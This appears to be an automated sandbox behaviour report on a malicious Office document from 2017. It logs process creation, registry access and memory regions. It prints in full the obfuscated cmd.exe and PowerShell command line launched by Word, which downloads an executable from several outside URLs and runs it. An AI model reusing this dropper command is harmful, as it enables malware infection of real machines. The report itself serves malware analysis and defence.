Get Address Unknown module name function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90 True 1
Fn
Get Address Unknown module name function = SafeArrayGetIID, address_out = 0x7feff1e5a60 True 1
Fn
Get Address Unknown module name function = SafeArraySetIID, address_out = 0x7feff1e5a30 True 1
Fn
Get Address Unknown module name function = SafeArrayCopyData, address_out = 0x7feff1c60b0 True 1
Fn
Get Address Unknown module name function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90 True 1
Fn
Get Address Unknown module name function = SafeArrayCreateEx, address_out = 0x7feff219f80 True 1
Fn
Get Address Unknown module name function = VarFormat, address_out = 0x7feff249b20 True 1
Fn
Get Address Unknown module name function = VarFormatDateTime, address_out = 0x7feff249aa0 True 1
Fn
Get Address Unknown module name function = VarFormatNumber, address_out = 0x7feff249990 True 1
Fn
Get Address Unknown module name function = VarFormatPercent, address_out = 0x7feff249890 True 1
Fn
Get Address Unknown module name function = VarFormatCurrency, address_out = 0x7feff249770 True 1
Fn
Get Address Unknown module name function = VarWeekdayName, address_out = 0x7feff22b8d0 True 1
Fn
Get Address Unknown module name function = VarMonthName, address_out = 0x7feff22b800 True 1
Fn
Get Address Unknown module name function = VarAdd, address_out = 0x7feff2448e0 True 1
Fn
Get Address Unknown module name function = VarAnd, address_out = 0x7feff249470 True 1
Fn
Get Address Unknown module name function = VarCat, address_out = 0x7feff2496a0 True 1
Fn
Get Address Unknown module name function = VarDiv, address_out = 0x7feff242fe0 True 1
Fn
Get Address Unknown module name function = VarEqv, address_out = 0x7feff249cf0 True 1
Fn
Get Address Unknown module name function = VarIdiv, address_out = 0x7feff248ff0 True 1
Fn
Get Address Unknown module name function = VarImp, address_out = 0x7feff249c00 True 1
Fn
Get Address Unknown module name function = VarMod, address_out = 0x7feff248e60 True 1
Fn
Get Address Unknown module name function = VarMul, address_out = 0x7feff243690 True 1
Fn
Get Address Unknown module name function = VarOr, address_out = 0x7feff2492d0 True 1
Fn
Get Address Unknown module name function = VarPow, address_out = 0x7feff242e80 True 1
Fn
Get Address Unknown module name function = VarSub, address_out = 0x7feff243f90 True 1
Fn
Get Address Unknown module name function = VarXor, address_out = 0x7feff2491a0 True 1
Fn
Get Address Unknown module name function = VarAbs, address_out = 0x7feff227c30 True 1
Fn
Get Address Unknown module name function = VarFix, address_out = 0x7feff227a60 True 1
Fn
Get Address Unknown module name function = VarInt, address_out = 0x7feff227890 True 1
Fn
Get Address Unknown module name function = VarNeg, address_out = 0x7feff227ea0 True 1
Fn
Get Address Unknown module name function = VarNot, address_out = 0x7feff249600 True 1
Fn
Get Address Unknown module name function = VarRound, address_out = 0x7feff2276a0 True 1
Fn
Get Address Unknown module name function = VarCmp, address_out = 0x7feff2483f0 True 1
Fn
Get Address Unknown module name function = VarDecAdd, address_out = 0x7feff1f3070 True 1
Fn
Get Address Unknown module name function = VarDecCmp, address_out = 0x7feff1fd700 True 1
Fn
Get Address Unknown module name function = VarBstrCat, address_out = 0x7feff1fd890 True 1
Fn
Get Address Unknown module name function = VarCyMulI4, address_out = 0x7feff1dcaf0 True 1
Fn
Get Address Unknown module name function = VarBstrCmp, address_out = 0x7feff1e8a00 True 1
Fn
Get Address Unknown module name function = CoCreateInstanceEx, address_out = 0x7fefe81de90 True 1
Fn
Get Address Unknown module name function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4 True 1
Fn
Get Address Unknown module name function = MsoMultiByteToWideChar, address_out = 0x7fee359f200 True 1
Fn
Get Address Unknown module name function = 713, address_out = 0x7fef103a1f4 True 1
Fn
Get Address Unknown module name function = 601, address_out = 0x7fef103c3e0 True 1
Fn
Get Address Unknown module name function = 600, address_out = 0x7fef0dbc6fc True 1
Fn
Get Address Unknown module name function = 632, address_out = 0x7fef0dffe60 True 1
Fn
Get Address Unknown module name function = 608, address_out = 0x7fef0e0142c True 1
Fn
System (30)
+
Operation Additional Information Success Count Logfile
Get Cursor x_out = 959, y_out = 696 True 3
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:02 (Local Time) True 16
Fn
Get Time type = Local Time, time = 2017-11-28 18:18:03 (Local Time) True 2
Fn
Get Time type = Local Time, time = 2017-11-28 18:19:09 (Local Time) True 6
Fn
Get Info type = Operating System False 2
Fn
Get Info type = Operating System True 1
Fn
Environment (1)
+
Operation Additional Information Success Count Logfile
Get Environment String name = DDRYBUR False 1
Fn
Process #2: cmd.exe
(Host: 88, Network: 0)
+
Information Value
ID #2
File Name c:\windows\system32\cmd.exe
Command Line CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:04
OS Process Information
+
Information Value
PID 0xad0
Parent PID 0x9d4 (c:\program files\microsoft office\root\office16\winword.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AD4
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True True False
private_0x0000000000150000 0x00150000 0x0024ffff Private Memory Readable, Writable True True False
private_0x0000000000270000 0x00270000 0x0036ffff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x0046ffff Private Memory Readable, Writable True True False
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006c0000 0x006c0000 0x00840fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000850000 0x00850000 0x01c4ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001c50000 0x01c50000 0x01f92fff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01fa0000 0x0226efff Memory Mapped File Readable False False False
cmd.exe 0x49f60000 0x49fb8fff Memory Mapped File Readable, Writable, Executable True False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
winbrand.dll 0x7fef5290000 0x7fef5297fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd320000 0x7fefd38afff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefd490000 0x7fefd49dfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7fefd4a0000 0x7fefd568fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefe300000 0x7fefe32dfff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7fefe330000 0x7fefe396fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7fefebf0000 0x7fefecf8fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefef80000 0x7feff01efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feff3b0000 0x7feff3b0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory Readable, Writable True True False
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
File (10)
+
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
+
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x49f60000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x76f70000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\CmD.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x76f86d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x76f823d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x76f78290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x76f817e0 True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-11-28 18:18:04 (UTC) True 1
Fn
Get Time type = Ticks, time = 85301 True 1
Fn
Environment (50)
+
Operation Additional Information Success Count Logfile
Get Environment String - True 11
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = binkOHOTJcSMBkQ False 1
Fn
Get Environment String name = =EINhmPkdO&&set False 1
Fn
Get Environment String name = kiqjRiiiH False 2
Fn
Get Environment String name = =owe^r^s&&set False 1
Fn
Get Environment String name = zzwpVwCTCRDvTBu False 1
Fn
Get Environment String name = =pOwoJiQoW&&set False 1
Fn
Get Environment String name = CdjPuLtXi False 2
Fn
Get Environment String name = =p&&set False 1
Fn
Get Environment String name = GKZajcAqFZkRLZw False 1
Fn
Get Environment String name = =NazJjhVlGSrXQvT&&set False 1
Fn
Get Environment String name = QiiPPcnDM False 2
Fn
Get Environment String name = =^he^l^l&&set False 1
Fn
Get Environment String name = jiIZiKXbkZQMpuQ False 1
Fn
Get Environment String name = =dipAbiiHEplZSHr&&! False 1
Fn
Get Environment String name = !! False 2
Fn
Get Environment String name = ! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp False 1
Fn
Get Environment String name = %CdjPuLtXi%, result_out = p True 1
Fn
Get Environment String name = %kiqjRiiiH%, result_out = owers True 1
Fn
Get Environment String name = %QiiPPcnDM%, result_out = hell True 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Set Environment String name = %binkOHOTJcSMBkQ%, value = EINhmPkdO True 1
Fn
Set Environment String name = %kiqjRiiiH%, value = owers True 1
Fn
Set Environment String name = %zzwpVwCTCRDvTBu%, value = pOwoJiQoW True 1
Fn
Set Environment String name = %CdjPuLtXi%, value = p True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #3: powershell.exe
(Host: 694, Network: 17)
+
Information Value
ID #3
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) )
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:19, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:04
OS Process Information
+
Information Value
PID 0xaec
Parent PID 0xad0 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x AF0
0x AF4
0x B00
0x B04
0x B08
0x B0C
0x B14
0x B18
0x B1C
0x B20
0x B28
0x B3C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
private_0x0000000000050000 0x00050000 0x000cffff Private Memory Readable, Writable True True False
locale.nls 0x000d0000 0x00136fff Memory Mapped File Readable False False False
pagefile_0x0000000000140000 0x00140000 0x00146fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable, Writable True False False
powershell.exe.mui 0x00160000 0x00162fff Memory Mapped File Readable, Writable False False False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True True False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False
cversions.2.db 0x001e0000 0x001e3fff Memory Mapped File Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x001f0000 0x00214fff Memory Mapped File Readable True False False
private_0x0000000000220000 0x00220000 0x0031ffff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x0041ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable, Writable True False False
cversions.2.db 0x00430000 0x00433fff Memory Mapped File Readable True False False
pagefile_0x0000000000440000 0x00440000 0x00440fff Pagefile Backed Memory Readable True False False
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005f0000 0x005f0000 0x00770fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000780000 0x00780000 0x01b7ffff Pagefile Backed Memory Readable True False False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db 0x01b80000 0x01baffff Memory Mapped File Readable True False False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01bb0000 0x01c15fff Memory Mapped File Readable True False False
pagefile_0x0000000001c20000 0x01c20000 0x01c22fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000001c30000 0x01c30000 0x01c30fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001c40000 0x01c40000 0x01c4ffff Private Memory Readable, Writable True True False
private_0x0000000001c50000 0x01c50000 0x01c5ffff Private Memory Readable, Writable True True False
private_0x0000000001c60000 0x01c60000 0x01d5ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001d60000 0x01d60000 0x01e3efff Pagefile Backed Memory Readable True False False
private_0x0000000001e40000 0x01e40000 0x01ebffff Private Memory Readable, Writable True True False
private_0x0000000001ec0000 0x01ec0000 0x01f3ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001f40000 0x01f40000 0x01f5ffff Private Memory - True True False
l_intl.nls 0x01f60000 0x01f62fff Memory Mapped File Readable False False False
private_0x0000000001f70000 0x01f70000 0x01f70fff Private Memory Readable, Writable True True False
private_0x0000000001f80000 0x01f80000 0x01f8ffff Private Memory Readable, Writable True True False
